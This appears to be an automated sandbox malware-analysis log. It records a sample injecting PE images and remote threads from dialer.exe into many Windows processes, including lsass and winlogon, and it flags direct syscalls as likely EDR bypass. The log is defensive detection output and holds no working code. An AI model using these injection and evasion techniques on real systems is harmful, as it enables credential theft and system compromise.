      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24099670000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23C4EE30000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1CF94FD0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1859E0F0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E099DB0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20541B40000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A83C320000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23092210000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23375660000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21CDFC50000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23236730000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20BB2B50000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1CE39510000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23C2F6F0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26A17C60000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: CA0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1EFC9BA0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DE50F10000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17660BD0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 11F7E5D0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20A36710000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 14F491D0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A0A2600000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\DriverStore\FileRepository\igcc_dch.inf_amd64_78ff17a5ea060c5f\OneApp.IGCC.WinService.exe base: 22BEFFD0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 18C35FB0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EC35F90000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 210BFBC0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 231A7AD0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 281ED520000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\DriverStore\FileRepository\dal.inf_amd64_ffc75848a6342fdf\jhi_service.exe base: 1B29C900000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C3354B0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\sihost.exe base: 20219540000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26F66570000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe base: BE0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C74BF50000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 29902C80000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26C52290000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 1DFBA830000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C27EF90000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\explorer.exe base: A850000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxEM.exe base: 240A7930000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 183ED2A0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1D37AF10000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\SettingSyncHost.exe base: 1FEFD650000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27ADB570000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C4355A0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17708DF0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 1C0FD030000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 182E47D0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 21671A10000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe base: 700000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 15357E10000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 226DF760000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2C5EE060000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 256199A0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BAD1F10000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 298A7C30000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E928AC0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1AEC6560000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 1CCAD210000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1F4E9D50000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 17E7E4F0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1947A0F0000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Google\Chrome\updater.exe base: 2A663B10000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C7FC420000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1A49CF30000 protect: page execute and read and write
      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 29C55440000 protect: page execute and read and write
      Creates a thread in another existing process (thread injection)
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\winlogon.exe EIP: 4D4A2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\lsass.exe EIP: A9DD2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 5DBD2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\dwm.exe EIP: E4E42908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 21EB2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 155B2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: E7492908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: DE762908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 9C802908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe EIP: 18342908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: DFF72908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 22472908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 5E7A2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 5B7A2908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe EIP: 6DA42908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe EIP: 93872908Jump to behavior
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4D502908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AA822908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5E912908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E4EA2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 21F12908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 15DD2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E74F2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DE7C2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9C862908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 18CA2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DFFD2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 224D2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5E802908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5BE42908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6DAA2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 938D2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 135B2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 99672908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4EE32908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 94FD2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9E0F2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 99DB2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 41B42908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3C322908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 92212908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 75662908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DFC52908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 36732908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B2B52908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 39512908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2F6F2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 17C62908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CA2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C9BA2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 50F12908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 60BD2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7E5D2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 36712908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 491D2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A2602908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: EFFD2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 35FB2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 35F92908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BFBC2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A7AD2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: ED522908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9C902908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 354B2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 19542908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 66572908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BE2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4BF52908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2C82908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 52292908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BA832908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7EF92908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A852908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A7932908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: ED2A2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7AF12908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FD652908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DB572908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 355A2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8DF2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FD032908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E47D2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 71A12908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 702908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 57E12908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DF762908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: EE062908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 199A2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D1F12908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A7C32908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 28AC2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C6562908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AD212908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E9D52908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7E4F2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7A0F2908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 63B12908
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe EIP: FC422908
      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\conhost.exe EIP: 9CF32908
      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 55442908
      Found direct / indirect Syscall (likely to bypass EDR)
      Source: C:\Program Files\Google\Chrome\updater.exeNtAdjustPrivilegesToken: Direct from: 0x7FF62DCC723E
      Source: C:\Users\user\Desktop\test2.exeNtQuerySystemInformation: Direct from: 0x7FF66154723EJump to behavior
      Injects a PE file into a foreign processes
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 2854D4A0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 207A9DD0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AD5DBD0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1F5E4E40000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20C21EB0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21F155B0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F7E7490000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 248DE760000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2B79C800000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe base: 29418340000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 276DFF70000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25C22470000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2D45E7A0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D05B7A0000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe base: 1B66DA40000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe base: 20F93870000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28813580000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 2854D500000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 207AA820000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AD5E910000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1F5E4EA0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20C21F10000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21F15DD0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F7E74F0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 248DE7C0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2B79C860000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe base: 29418CA0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 276DFFD0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25C224D0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2D45E800000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D05BE40000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe base: 1B66DAA0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe base: 20F938D0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 288135B0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24099670000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23C4EE30000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CF94FD0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1859E0F0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E099DB0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20541B40000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A83C320000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23092210000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23375660000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21CDFC50000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23236730000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20BB2B50000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CE39510000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23C2F6F0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26A17C60000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: CA0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1EFC9BA0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DE50F10000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17660BD0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 11F7E5D0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20A36710000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 14F491D0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A0A2600000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\DriverStore\FileRepository\igcc_dch.inf_amd64_78ff17a5ea060c5f\OneApp.IGCC.WinService.exe base: 22BEFFD0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 18C35FB0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EC35F90000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 210BFBC0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 231A7AD0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 281ED520000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\DriverStore\FileRepository\dal.inf_amd64_ffc75848a6342fdf\jhi_service.exe base: 1B29C900000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C3354B0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 20219540000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26F66570000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe base: BE0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C74BF50000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29902C80000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26C52290000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1DFBA830000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C27EF90000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: A850000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxEM.exe base: 240A7930000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 183ED2A0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D37AF10000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\SettingSyncHost.exe base: 1FEFD650000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 27ADB570000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C4355A0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17708DF0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1C0FD030000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 182E47D0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 21671A10000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe base: 700000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15357E10000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 226DF760000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2C5EE060000 value starts with: 4D5A
